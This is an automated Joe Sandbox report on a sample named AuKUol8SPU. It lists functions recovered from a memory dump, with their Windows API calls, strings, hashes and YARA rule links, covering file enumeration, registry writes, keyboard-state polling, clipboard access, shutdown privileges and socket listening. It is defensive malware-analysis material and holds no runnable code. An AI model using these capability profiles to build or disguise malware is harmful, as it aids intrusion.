%4d, xrefs: 00B7C8CD
%4d%02d%02d%02d%02d%02d, xrefs: 00B7C88A

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: 0ebe495867ea2ae3154d3313a9464b696e371eca6c48ec144faf6898fc33a6d2
Instruction ID: a2f0917edf7a8c87d86c6705c12f1eb1ffe7678a20a30e9d1e8072b1e718a957
Opcode Fuzzy Hash: 0ebe495867ea2ae3154d3313a9464b696e371eca6c48ec144faf6898fc33a6d2
Instruction Fuzzy Hash: E5A11AB2408245ABC710EFA4C896DEFB7ECFF95700F80496DF59587191EA30DA48CB62

Function 00B7EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 00B7EFB6
_wcscmp.LIBCMT ref: 00B7EFCB
_wcscmp.LIBCMT ref: 00B7EFE2
GetFileAttributesW.KERNEL32(?), ref: 00B7EFF4
SetFileAttributesW.KERNEL32(?,?), ref: 00B7F00E
FindNextFileW.KERNEL32(00000000,?), ref: 00B7F026
FindClose.KERNEL32(00000000), ref: 00B7F031
FindFirstFileW.KERNEL32(*.*,?), ref: 00B7F04D
_wcscmp.LIBCMT ref: 00B7F074
_wcscmp.LIBCMT ref: 00B7F08B
SetCurrentDirectoryW.KERNEL32(?), ref: 00B7F09D
SetCurrentDirectoryW.KERNEL32(00BC8920), ref: 00B7F0BB
FindNextFileW.KERNEL32(00000000,00000010), ref: 00B7F0C5
FindClose.KERNEL32(00000000), ref: 00B7F0D2
FindClose.KERNEL32(00000000), ref: 00B7F0E4

Strings

*.*, xrefs: 00B7F048

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: f2500936597d6a5ec5d47be397d58d4a76129882aad666372b19121a9b0d6479
Instruction ID: 7cb28378cf12857e938bd68512bf534dda7c0802aea899bc7ad9a58a0f5e07b0
Opcode Fuzzy Hash: f2500936597d6a5ec5d47be397d58d4a76129882aad666372b19121a9b0d6479
Instruction Fuzzy Hash: C531C03250121A6ADB149FB4DC49AFE77ECDF49360F1481F6E828D31A1DB70DA44CA69

Function 00B90857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B90953
RegCreateKeyExW.ADVAPI32(?,?,00000000,00B9F910,00000000,?,00000000,?,?), ref: 00B909C1
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00B90A09
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00B90A92
RegCloseKey.ADVAPI32(?), ref: 00B90DB2
RegCloseKey.ADVAPI32(00000000), ref: 00B90DBF

Strings

REG_DWORD, xrefs: 00B90C83
REG_SZ, xrefs: 00B90AD0
REG_BINARY, xrefs: 00B90D4D
REG_EXPAND_SZ, xrefs: 00B90A2F
REG_QWORD, xrefs: 00B90D00
REG_MULTI_SZ, xrefs: 00B90B7A

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 40e08c84a1fdb51da911f4bef7831cb5aac7c76af0fdea5cbd316cc4029d8e75
Instruction ID: b7176d7a3dd9354ed3480fa71d82fa627b36b87753c10ed8081b262784587379
Opcode Fuzzy Hash: 40e08c84a1fdb51da911f4bef7831cb5aac7c76af0fdea5cbd316cc4029d8e75
Instruction Fuzzy Hash: 03027E756006519FCB14EF14C895E6AB7E5FF89720F0484ADF89A9B3A2DB30ED41CB81

Function 00B7F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 00B7F113
_wcscmp.LIBCMT ref: 00B7F128
_wcscmp.LIBCMT ref: 00B7F13F

Part of subcall function 00B74385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00B743A0

FindNextFileW.KERNEL32(00000000,?), ref: 00B7F16E
FindClose.KERNEL32(00000000), ref: 00B7F179
FindFirstFileW.KERNEL32(*.*,?), ref: 00B7F195
_wcscmp.LIBCMT ref: 00B7F1BC
_wcscmp.LIBCMT ref: 00B7F1D3
SetCurrentDirectoryW.KERNEL32(?), ref: 00B7F1E5
SetCurrentDirectoryW.KERNEL32(00BC8920), ref: 00B7F203
FindNextFileW.KERNEL32(00000000,00000010), ref: 00B7F20D
FindClose.KERNEL32(00000000), ref: 00B7F21A
FindClose.KERNEL32(00000000), ref: 00B7F22C

Strings

*.*, xrefs: 00B7F190

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: 7f6da26d7232fd1729dd6ebe059a0d92283c4f71a911e5ed4facb9ddc80f4578
Instruction ID: 8c7aa20f9b5a282969cd0eb61f05f82081a0b5b820b42fa1c7f95db0be212242
Opcode Fuzzy Hash: 7f6da26d7232fd1729dd6ebe059a0d92283c4f71a911e5ed4facb9ddc80f4578
Instruction Fuzzy Hash: 3431833650021AAADB109FA4EC49EFE77ECDF45360F1581F6F828E31A1DB70DA45CA58

Function 00B7A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00B7A20F
__swprintf.LIBCMT ref: 00B7A231
CreateDirectoryW.KERNEL32(?,00000000), ref: 00B7A26E
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00B7A293
_memset.LIBCMT ref: 00B7A2B2
_wcsncpy.LIBCMT ref: 00B7A2EE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00B7A323
CloseHandle.KERNEL32(00000000), ref: 00B7A32E
RemoveDirectoryW.KERNEL32(?), ref: 00B7A337
CloseHandle.KERNEL32(00000000), ref: 00B7A341

Strings

\??\%s, xrefs: 00B7A22B
:, xrefs: 00B7A252
\, xrefs: 00B7A247

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 36e1ba1de5fe903f4c7114cad523f593eece1010f34f6631a4d1ba4b6f5ab64f
Instruction ID: c9695e0d2bfa15d0964d0e2739d950435ea23dac07d43fc285df44e13f861b31
Opcode Fuzzy Hash: 36e1ba1de5fe903f4c7114cad523f593eece1010f34f6631a4d1ba4b6f5ab64f
Instruction Fuzzy Hash: 85318CB190410AABDB219FA0DC49FFF77BCEF88750F2041B6F519D2161EB7496448B29

Function 00B266E1 Relevance: 18.4, Strings: 14, Instructions: 889COMMON

Download Yara Rule

Strings

CRLF), xrefs: 00B612C1
BSR_UNICODE), xrefs: 00B61338
ANY), xrefs: 00B612DE
LIMIT_MATCH=, xrefs: 00B61170
UTF16), xrefs: 00B610CF
NO_START_OPT), xrefs: 00B6114F
CR), xrefs: 00B61287
UCP), xrefs: 00B6110D
UTF), xrefs: 00B610FA
BSR_ANYCRLF), xrefs: 00B6131E
LF), xrefs: 00B612A4
LIMIT_RECURSION=, xrefs: 00B611FC
ANYCRLF), xrefs: 00B612FB
NO_AUTO_POSSESS), xrefs: 00B6112E

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
API String ID: 0-4052911093
Opcode ID: 796e2ab373fc360bc3d2eecfe8b073c70ce61df2011d949c4df3011db57e7acc
Instruction ID: 6fe9e093dac6e9da0aefc78784f58694be933f2392f7d7ce923742dd815cd13d
Opcode Fuzzy Hash: 796e2ab373fc360bc3d2eecfe8b073c70ce61df2011d949c4df3011db57e7acc
Instruction Fuzzy Hash: 2C726075E00229DBDB14DF59D8817AEB7F5FF48310F1485AAE80AEB290DB749D81CB90

Function 00B7001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00B70097
SetKeyboardState.USER32(?), ref: 00B70102
GetAsyncKeyState.USER32(000000A0), ref: 00B70122
GetKeyState.USER32(000000A0), ref: 00B70139
GetAsyncKeyState.USER32(000000A1), ref: 00B70168
GetKeyState.USER32(000000A1), ref: 00B70179
GetAsyncKeyState.USER32(00000011), ref: 00B701A5
GetKeyState.USER32(00000011), ref: 00B701B3
GetAsyncKeyState.USER32(00000012), ref: 00B701DC
GetKeyState.USER32(00000012), ref: 00B701EA
GetAsyncKeyState.USER32(0000005B), ref: 00B70213
GetKeyState.USER32(0000005B), ref: 00B70221

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 765984f9fd97c89b3f3361c683e6f55175630440e0f762f20d56154a2a7e35f7
Instruction ID: 1bc06c7f9530b50d76d33692f8ccb89b5295e3e580be037f9e89ce04eba8960f
Opcode Fuzzy Hash: 765984f9fd97c89b3f3361c683e6f55175630440e0f762f20d56154a2a7e35f7
Instruction Fuzzy Hash: 0351F920914388A9FB31F76488147AABFF4DF01380F48C5DBD9DA565C3DAA49B8CC761

Function 00B903DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B90E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B8FDAD,?,?), ref: 00B90E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B904AC

Part of subcall function 00B19837: __itow.LIBCMT ref: 00B19862
Part of subcall function 00B19837: __swprintf.LIBCMT ref: 00B198AC

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00B9054B
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00B905E3
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00B90822
RegCloseKey.ADVAPI32(00000000), ref: 00B9082F

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 93a96c43ededee1b12a8950cb11d176245ff390668152ad4c11ecbf910a91ca2
Instruction ID: e03696499bb25520eeb5e07a8014c9736acff91bb06bec713db426437aed8b6b
Opcode Fuzzy Hash: 93a96c43ededee1b12a8950cb11d176245ff390668152ad4c11ecbf910a91ca2
Instruction Fuzzy Hash: 8EE14E31604215AFCB14EF24C895E6ABBF8EF89314F0485ADF84ADB261DB30ED41CB91

Function 00B883BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00B19837: __itow.LIBCMT ref: 00B19862
Part of subcall function 00B19837: __swprintf.LIBCMT ref: 00B198AC

CoInitialize.OLE32 ref: 00B88403
CoUninitialize.OLE32 ref: 00B8840E
CoCreateInstance.OLE32(?,00000000,00000017,00BA2BEC,?), ref: 00B8846E
IIDFromString.OLE32(?,?), ref: 00B884E1
VariantInit.OLEAUT32(?), ref: 00B8857B
VariantClear.OLEAUT32(?), ref: 00B885DC

Strings

Invalid parameter, xrefs: 00B884FA
Failed to create object, xrefs: 00B88479, 00B8852F
NULL Pointer assignment, xrefs: 00B884B3

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 298e439af0fb6a06e30942f53dcfe73f249b0a8ddbeb5ca20ef907c28405d591
Instruction ID: 52f7293614b469daeffb09dbc7ef1f752ff9c9ed809ccc51571bb3b25c2d8e77
Opcode Fuzzy Hash: 298e439af0fb6a06e30942f53dcfe73f249b0a8ddbeb5ca20ef907c28405d591
Instruction Fuzzy Hash: 2061CE716083129FC710EF14D888FAAB7E8EF55754F84489DF9869B2A1CB70ED44CB92

Function 00B84164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00B8418B
EmptyClipboard.USER32 ref: 00B84191
GlobalAlloc.KERNEL32(00000002,?), ref: 00B841A6
CloseClipboard.USER32 ref: 00B84245

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 3af8c584316608ef0c41a6161ff638aa5beb87e74e30869140c47b0a9400e236
Instruction ID: 5eb2266a648a23a355e27a9b4f493468b785f8a04931d3f081c45beed3e81325
Opcode Fuzzy Hash: 3af8c584316608ef0c41a6161ff638aa5beb87e74e30869140c47b0a9400e236
Instruction Fuzzy Hash: A8218D352002129FDB10AF24ED59B6A7BE8EF15760F1080AAF946DB2B1DF30AD41CB54

Function 00B737EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B14750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B14743,?,?,00B137AE,?), ref: 00B14770

Part of subcall function 00B74A31: GetFileAttributesW.KERNEL32(?,00B7370B), ref: 00B74A32

FindFirstFileW.KERNEL32(?,?), ref: 00B738A3
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00B7394B
MoveFileW.KERNEL32(?,?), ref: 00B7395E
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00B7397B
FindNextFileW.KERNEL32(00000000,00000010), ref: 00B7399D
FindClose.KERNEL32(00000000,?,?,?,?), ref: 00B739B9

Strings

\*.*, xrefs: 00B7384E, 00B73857, 00B7386C

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: ca49f097bb3aa5706f844301f4a1d4e12b7c7425869dfeaf6689b98e4961de9f
Instruction ID: 9ef2a3ee3ee4a896e939dcd0145f82368130276fdd49ed01a26bdcf54403afb2
Opcode Fuzzy Hash: ca49f097bb3aa5706f844301f4a1d4e12b7c7425869dfeaf6689b98e4961de9f
Instruction Fuzzy Hash: 9C517F3180514DAACF11EBA0CA929FDB7F9AF15300FA040E9E41AB7191EF316F49DB61

Function 00B7F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00B17DE1: _memmove.LIBCMT ref: 00B17E22

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00B7F440
Sleep.KERNEL32(0000000A), ref: 00B7F470
_wcscmp.LIBCMT ref: 00B7F484
_wcscmp.LIBCMT ref: 00B7F49F
FindNextFileW.KERNEL32(?,?), ref: 00B7F53D
FindClose.KERNEL32(00000000), ref: 00B7F553

Strings

*.*, xrefs: 00B7F425

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: 83ab10b3df5ea169c50dfa967d6287409ed5aefcc329805e9a4e2ea3e1a747b9
Instruction ID: e41a1062ff0874fc5388da984b29367c493a63442920550a89b0d782c03424b2
Opcode Fuzzy Hash: 83ab10b3df5ea169c50dfa967d6287409ed5aefcc329805e9a4e2ea3e1a747b9
Instruction Fuzzy Hash: C9416D7194021A9FCF14DF64DC45AFEBBF4FF15314F5484A6E829A32A1EB309A84CB94

Function 00B25760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00B258A5
_memmove.LIBCMT ref: 00B258F5
_memmove.LIBCMT ref: 00B2595B

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 3d26bb83a21ea8e2827177b18f6086df02f75df6a17701f4ed7f952ac4f89c5e
Instruction ID: 16aa398611dcf2c194e8c389e74ad59c27c1af28bae7c1e587b547d3a3f5dd8a
Opcode Fuzzy Hash: 3d26bb83a21ea8e2827177b18f6086df02f75df6a17701f4ed7f952ac4f89c5e
Instruction Fuzzy Hash: 8C128B70A00619DFDF14EFA5D985AEEB7F5FF48300F2045A9E80AA7250EB39AD51CB50

Function 00B751BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00B687E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B6882B
Part of subcall function 00B687E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B68858
Part of subcall function 00B687E1: GetLastError.KERNEL32 ref: 00B68865

ExitWindowsEx.USER32(?,00000000), ref: 00B751F9

Strings

SeShutdownPrivilege, xrefs: 00B751C9
@, xrefs: 00B751EC
, xrefs: 00B751E7

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 459385b0e4204bb4f67bc2da1b5551b8b43e4a25aa9e3a35238d27d026704f3b
Instruction ID: b9580c658572139cdc8032316f5945fc04e3b61330aca8fdb5b822ba8e137caf
Opcode Fuzzy Hash: 459385b0e4204bb4f67bc2da1b5551b8b43e4a25aa9e3a35238d27d026704f3b
Instruction Fuzzy Hash: F601F7317916166BE73867689C8AFBA72D8DB05751F2185E5F92FE20D3DDD11C0085A0

Function 00B86283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00B862DC
WSAGetLastError.WSOCK32(00000000), ref: 00B862EB
bind.WSOCK32(00000000,?,00000010), ref: 00B86307
listen.WSOCK32(00000000,00000005), ref: 00B86316
WSAGetLastError.WSOCK32(00000000), ref: 00B86330
closesocket.WSOCK32(00000000,00000000), ref: 00B86344

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 38e0a8110fe8d1c6f6e9ab5578f7efccfe1a675cd0d216b921dc3022918970b4
